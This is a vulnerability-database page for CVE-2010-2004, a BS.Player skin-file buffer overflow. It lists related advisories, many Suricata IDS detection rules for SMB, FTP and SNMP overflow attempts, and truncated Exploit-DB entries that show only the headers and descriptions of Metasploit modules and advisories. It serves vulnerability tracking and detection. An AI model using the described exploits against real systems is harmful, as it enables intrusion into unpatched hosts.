CVE-2010-2004
published 2010-05-20CVE-2010-2004: Stack-based buffer overflow in BS.Global BS.Player 2.51 Build 1022 Free, and possibly other versions, allows user-assisted remote attackers to execute…
PriorityP347critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
9.32%
94.8th percentile
Stack-based buffer overflow in BS.Global BS.Player 2.51 Build 1022 Free, and possibly other versions, allows user-assisted remote attackers to execute arbitrary code via the Skin parameter in the Options section of a skins file (.bsi), a different vulnerability than CVE-2009-1068.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bsplayer | bs.player | — | — |
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2cxm-7f99-2c44: Stack-based buffer overflow in BS
ghsa_unreviewed·2022-05-17·CVSS 9.3
CVE-2010-2004 [CRITICAL] CWE-119 GHSA-2cxm-7f99-2c44: Stack-based buffer overflow in BS
Stack-based buffer overflow in BS.Global BS.Player 2.51 Build 1022 Free, and possibly other versions, allows user-assisted remote attackers to execute arbitrary code via the Skin parameter in the Options section of a skins file (.bsi), a different vulnerability than CVE-2009-1068.
Red Hat
pidgin/libpurple: MSN custom smiley request directory traversal file disclosure
vendor_redhat·2009-12-27·CVSS 5.0
CVE-2010-0013 [MEDIUM] pidgin/libpurple: MSN custom smiley request directory traversal file disclosure
pidgin/libpurple: MSN custom smiley request directory traversal file disclosure
Directory traversal vulnerability in slp.c in the MSN protocol plugin in libpurple in Pidgin 2.6.4 and Adium 1.3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in an application/x-msnmsgrp2p MSN emoticon (aka custom smiley) request, a related issue to CVE-2004-0122. NOTE: it could be argued that this is resultant from a vulnerability in which an emoticon download request is processed even without a preceding text/x-mms-emoticon message that announced availability of the emoticon.
Suricata
GPL NETBIOS SMB-DS NDdeSetTrustedShareW overflow attempt
suricata·2010-09-23
CVE-2004-0206 GPL NETBIOS SMB-DS NDdeSetTrustedShareW overflow attempt
GPL NETBIOS SMB-DS NDdeSetTrustedShareW overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NDdeSetTrustedShareW overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102938; rev:6; metadata:created_at 2010_
Suricata
GPL FTP MDTM overflow attempt
suricata·2010-09-23
CVE-2001-1021 GPL FTP MDTM overflow attempt
GPL FTP MDTM overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP MDTM overflow attempt"; flow:established,to_server; content:"MDTM"; nocase; isdataat:100,relative; pcre:"/^MDTM\s[^\n]{100}/smi"; reference:bugtraq,9751; reference:cve,2001-1021; reference:cve,2004-0330; reference:nessus,12080; classtype:attempted-admin; sid:2102546; rev:8; metadata:created_at 2010_09_23, cve CVE_2001_1021, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL NETBIOS SMB-DS nddeapi create tree attempt
suricata·2010-09-23
CVE-2004-0206 GPL NETBIOS SMB-DS nddeapi create tree attempt
GPL NETBIOS SMB-DS nddeapi create tree attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; flowbits:set,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|5C|nddeapi|00|"; within:9; distance:78; nocase; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102930; rev:6; metadata:created_at 2010_09_23, cve CVE_2004_0206, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_14;)
Suricata
GPL NETBIOS SMB NT Trans NT CREATE unicode DACL overflow attempt
suricata·2010-09-23
CVE-2004-1154 GPL NETBIOS SMB NT Trans NT CREATE unicode DACL overflow attempt
GPL NETBIOS SMB NT Trans NT CREATE unicode DACL overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode DACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:20; byte_jump:4,20,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103036; rev:5; metadata:created_at 2010_09_23, cve CVE_2004_1154, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL NETBIOS SMB nddeapi unicode bind attempt
suricata·2010-09-23
CVE-2004-0206 GPL NETBIOS SMB nddeapi unicode bind attempt
GPL NETBIOS SMB nddeapi unicode bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi unicode bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; flowbits:set,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102933; rev:7; metadata:created_at 2010_09_23, cve CVE_2004
Suricata
GPL NETBIOS SMB-DS nddeapi andx create tree attempt
suricata·2010-09-23
CVE-2004-0206 GPL NETBIOS SMB-DS nddeapi andx create tree attempt
GPL NETBIOS SMB-DS nddeapi andx create tree attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; flowbits:set,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C|nddeapi|00|"; within:9; distance:51; nocase; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102958; rev:5; metadata:created_at 2010_09_23, cve CVE_2004_0206, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updat
Suricata
GPL NETBIOS SMB NT Trans NT CREATE andx SACL overflow attempt
suricata·2010-09-23
CVE-2004-1154 GPL NETBIOS SMB NT Trans NT CREATE andx SACL overflow attempt
GPL NETBIOS SMB NT Trans NT CREATE andx SACL overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE andx SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103027; rev:6; metadata:created_at 2010_09_23, cve CVE_2004_1154, confidence Medium, signature_s
Suricata
GPL NETBIOS SMB-DS NT Trans NT CREATE SACL overflow attempt
suricata·2010-09-23
CVE-2004-1154 GPL NETBIOS SMB-DS NT Trans NT CREATE SACL overflow attempt
GPL NETBIOS SMB-DS NT Trans NT CREATE SACL overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103030; rev:5; metadata:created_at 2010_09_23, cve CVE_2004_1154, confidence Medium, signature_severity Informational, updated_at 2019_07_26;)
Suricata
GPL NETBIOS SMB NT Trans NT CREATE unicode SACL overflow attempt
suricata·2010-09-23
CVE-2004-1154 GPL NETBIOS SMB NT Trans NT CREATE unicode SACL overflow attempt
GPL NETBIOS SMB NT Trans NT CREATE unicode SACL overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103028; rev:5; metadata:created_at 2010_09_23, cve CVE_2004_1154, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL NETBIOS SMB-DS nddeapi unicode bind attempt
suricata·2010-09-23
CVE-2004-0206 GPL NETBIOS SMB-DS nddeapi unicode bind attempt
GPL NETBIOS SMB-DS nddeapi unicode bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi unicode bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; flowbits:set,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102935; rev:8; metadata:created_at 2010_09_23, cve CV
Suricata
GPL NETBIOS SMB nddeapi bind attempt
suricata·2010-09-23
CVE-2004-0206 GPL NETBIOS SMB nddeapi bind attempt
GPL NETBIOS SMB nddeapi bind attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB nddeapi bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; flowbits:set,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102932; rev:7; metadata:created_at 2010_09_23, cve CVE_2004_0206, signature_severity Informational
Suricata
GPL NETBIOS SMB NT Trans NT CREATE unicode andx SACL overflow attempt
suricata·2010-09-23
CVE-2004-1154 GPL NETBIOS SMB NT Trans NT CREATE unicode andx SACL overflow attempt
GPL NETBIOS SMB NT Trans NT CREATE unicode andx SACL overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode andx SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103029; rev:6; metadata:created_at 2010_09_23, cve CVE_2004_1154, confidence Medi
Suricata
GPL NETBIOS SMB NT Trans NT CREATE oversized Security Descriptor attempt
suricata·2010-09-23
CVE-2004-1154 GPL NETBIOS SMB NT Trans NT CREATE oversized Security Descriptor attempt
GPL NETBIOS SMB NT Trans NT CREATE oversized Security Descriptor attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; pcre:"/^.{27}/R"; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; pcre:"/^.{4}/R"; byte_test:4,>,1024,36,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103018; rev:5; metadata:created_at 2010_09_23, cve CVE_2004_1154, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL NETBIOS SMB-DS nddeapi unicode create tree attempt
suricata·2010-09-23
CVE-2004-0206 GPL NETBIOS SMB-DS nddeapi unicode create tree attempt
GPL NETBIOS SMB-DS nddeapi unicode create tree attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi unicode create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; flowbits:set,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|5C 00|n|00|d|00|d|00|e|00|a|00|p|00|i|00 00 00|"; within:18; distance:78; nocase; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102931; rev:6; metadata:created_at 2010_09_23, cve CVE_2004_0206, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_14;)
Suricata
GPL NETBIOS SMB-DS NT Trans NT CREATE oversized Security Descriptor attempt
suricata·2010-09-23
CVE-2004-1154 GPL NETBIOS SMB-DS NT Trans NT CREATE oversized Security Descriptor attempt
GPL NETBIOS SMB-DS NT Trans NT CREATE oversized Security Descriptor attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS NT Trans NT CREATE oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; pcre:"/^.{27}/R"; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; isdataat:4,relative; byte_test:4,>,1024,40,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103022; rev:4; metadata:created_at 2010_09_23, cve CVE_2004_1154, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL NETBIOS SMB NT Trans NT CREATE SACL overflow attempt
suricata·2010-09-23
CVE-2004-1154 GPL NETBIOS SMB NT Trans NT CREATE SACL overflow attempt
GPL NETBIOS SMB NT Trans NT CREATE SACL overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE SACL overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|01 00|"; within:2; distance:64; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; byte_test:4,>,32,-16,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103026; rev:5; metadata:created_at 2010_09_23, cve CVE_2004_1154, confidence Medium, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
GPL NETBIOS SMB NT Trans NT CREATE unicode oversized Security Descriptor attempt
suricata·2010-09-23
CVE-2004-1154 GPL NETBIOS SMB NT Trans NT CREATE unicode oversized Security Descriptor attempt
GPL NETBIOS SMB NT Trans NT CREATE unicode oversized Security Descriptor attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; pcre:"/^.{27}/R"; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; pcre:"/^.{4}/R"; byte_test:4,>,1024,36,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103020; rev:5; metadata:created_at 2010_09_23, cve CVE_2004_1154, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2019_07_26;)
Suricata
ET SNMP Attempted TCP Access Attempt to Cisco IOS 12.1 Hidden Read/Write Community String cable-docsis
suricata·2010-07-30
CVE-2004-1776 ET SNMP Attempted TCP Access Attempt to Cisco IOS 12.1 Hidden Read/Write Community String cable-docsis
ET SNMP Attempted TCP Access Attempt to Cisco IOS 12.1 Hidden Read/Write Community String cable-docsis
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 161 (msg:"ET SNMP Attempted TCP Access Attempt to Cisco IOS 12.1 Hidden Read/Write Community String cable-docsis"; flow:established,to_server; content:"cable-docsis"; nocase; reference:url,www.cisco.com/warp/public/707/cisco-sa-20010228-ios-snmp-community.shtml; reference:url,www.iss.net/security_center/reference/vuln/cisco-ios-cable-docsis.htm; reference:url,www.kb.cert.org/vuls/id/840665; reference:cve,2004-1776; classtype:attempted-admin; sid:2011014; rev:3; metadata:created_at 2010_07_30, cve CVE_2004_1776, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06;)
Exploit-DB
Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)
exploitdb·2010-09-20
CVE-2004-1080 Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)
Microsoft WINS - Service Memory Overwrite (MS04-045) (Metasploit)
---
##
# $Id: ms04_045_wins.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft WINS Service Memory Overwrite',
'Description' => %q{
This module exploits an arbitrary memory write flaw in the
WINS service. This exploit has been tested against Windows
2000 only.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE', '2004-1080'],
[ 'OSVDB', '12378'],
[ 'BID', '11763'],
[ '
Exploit-DB
Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2004-0608 Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)
Unreal Tournament 2004 (Linux) - 'secure' Remote Overflow (Metasploit)
---
##
# $Id: ut2004_secure.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Unreal Tournament 2004 "secure" Overflow (Linux)',
'Description' => %q{
This is an exploit for the GameSpy secure query in
the Unreal Engine.
This exploit only requires one UDP packet, which can
be both spoofed and sent to a broadcast address.
Usually, the GameSpy query server listens on port 7787,
but you can manually specify the port as well.
The RunServe
Exploit-DB
IPSwitch IMail IMAP4D - Delete Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2004-1520 IPSwitch IMail IMAP4D - Delete Overflow (Metasploit)
IPSwitch IMail IMAP4D - Delete Overflow (Metasploit)
---
##
# $Id: imail_delete.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'IMail IMAP4D Delete Overflow',
'Description' => %q{
This module exploits a buffer overflow in the 'DELETE'
command of the the IMail IMAP4D service. This vulnerability
can only be exploited with a valid username and password.
This flaw was patched in version 8.14.
},
'Author' => [ 'spoonm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE',
Exploit-DB
Proxy-Pro Professional GateKeeper 4.7 - GET Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2004-0326 Proxy-Pro Professional GateKeeper 4.7 - GET Overflow (Metasploit)
Proxy-Pro Professional GateKeeper 4.7 - GET Overflow (Metasploit)
---
##
# $Id: proxypro_http_get.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Proxy-Pro Professional
GateKeeper 4.7. By sending a long HTTP GET to the default port
of 3128, a remote attacker could overflow a buffer and execute
arbitrary code.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revis
Exploit-DB
WebSTAR FTP Server - USER Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2004-0695 WebSTAR FTP Server - USER Overflow (Metasploit)
WebSTAR FTP Server - USER Overflow (Metasploit)
---
##
# $Id: webstar_ftp_user.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'WebSTAR FTP Server USER Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the logging routine
of the WebSTAR FTP server. Reliable code execution is
obtained by a series of hops through the System library.
},
'Author' => [ 'ddz', 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10394 $',
'References' =>
[
[ 'CVE', '2004-0695'],
[ 'OSVDB',
Exploit-DB
eshtery CMS - SQL Injection
exploitdb·2010-09-12
CVE-2010-3404 eshtery CMS - SQL Injection
eshtery CMS - SQL Injection
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub12-eshtery-cms-sql-injection-vulnerability/
'''
Abysssec Inc Public Advisory
Title : eshtery CMS Sql Injection Vulnerability
Affected Version : eshtery copyrights 2003-2004
Discovery : www.abysssec.com
Vendor : http://eshtery.she7ata.com/projects/eshtery/
Demo : http://eshtery.she7ata.com/projects/eshtery/
Download Links : http://sourceforge.net/projects/eshtery/
Description :
1) SQL Injection
for successful injection in this cms you have to pass two steps.
Step 1:
Go to this path:
http://Example.com/catlgsearch.aspx
and enter this value
Exploit-DB
Apple QuickTime - '_Marshaled_pUnk' Backdoor Client-Side Arbitrary Code Execution
exploitdb·2010-08-30
CVE-2010-1818 Apple QuickTime - '_Marshaled_pUnk' Backdoor Client-Side Arbitrary Code Execution
Apple QuickTime - '_Marshaled_pUnk' Backdoor Client-Side Arbitrary Code Execution
---
Original Source: http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1
Victim prerequisites:
* Internet Explorer.
* XP,Vista,W7.
* Apple Quicktime 7.x, 6.x ( 2004 versions are also vulnerable, older versions not checked )
1. Victim is enticed into visiting, by any mean, a specially crafted webpage.
2. Attacker's payload to be executed under the context of the browser.
3. Attacker calls his girlfriend to inform about the successful exploitation, who indeed turns out to be very interested in the issue. She demands more technical details.
4. Attacker wakes up.
Technical details
QTPlugin.ocx implements IPersistPropertyBag2::Read (1000E330) to handle params received from where it
Exploit-DB
Subversion - Date Svnserve (Metasploit)
exploitdb·2010-08-07
CVE-2004-0397 Subversion - Date Svnserve (Metasploit)
Subversion - Date Svnserve (Metasploit)
---
##
# $Id: svnserve_date.rb 9971 2010-08-07 06:59:16Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/http/client'
class Metasploit3 'Subversion Date Svnserve',
'Description' => %q{
This is an exploit for the Subversion date parsing overflow. This
exploit is for the svnserve daemon (svn:// protocol) and will not work
for Subversion over webdav (http[s]://). This exploit should never
crash the daemon, and should be safe to do multi-hits.
**WARNING** This exploit seems to (not very of
Exploit-DB
IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-07-14
CVE-2004-0798 IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow (Metasploit)
IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: ipswitch_wug_maincfgret.rb 9820 2010-07-14 13:59:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /WhatsUp/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ipswitch WhatsUp Gold 8.03 Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By
posting a long string for the value of 'instancename' in the _maincfgret.cgi
script an attacker can
Exploit-DB
Microsoft IIS - ISAPI 'w3who.dll' Query String Overflow (Metasploit)
exploitdb·2010-07-07
CVE-2004-1134 Microsoft IIS - ISAPI 'w3who.dll' Query String Overflow (Metasploit)
Microsoft IIS - ISAPI 'w3who.dll' Query String Overflow (Metasploit)
---
##
# $Id: w3who_query.rb 9719 2010-07-07 17:38:59Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ // ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the w3who.dll ISAPI
application. This vulnerability was discovered Nicolas
Gregoire and this code has been successfully tested again
Exploit-DB
TWiki - Search Function Arbitrary Command Execution (Metasploit)
exploitdb·2010-07-03
CVE-2004-1037 TWiki - Search Function Arbitrary Command Execution (Metasploit)
TWiki - Search Function Arbitrary Command Execution (Metasploit)
---
##
# $Id: twiki_search.rb 9671 2010-07-03 06:21:31Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'TWiki Search Function Arbitrary Command Execution',
'Description' => %q{
This module exploits a vulnerability in the search component of TWiki.
By passing a 'search' parameter containing shell metacharacters to the
'WebSearch' script, an attacker can execute arbitrary OS commands.
},
'Author' =>
[
# Unknown - original discovery
'jduck' # metasploit version
],
'Licens
Exploit-DB
Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)
exploitdb·2010-07-03
CVE-2004-0206 Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)
Microsoft NetDDE Service - Remote Overflow (MS04-031) (Metasploit)
---
##
# $Id: ms04_031_netdde.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft NetDDE Service Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the NetDDE service, which is the
precursor to the DCOM interface. This exploit effects only operating systems
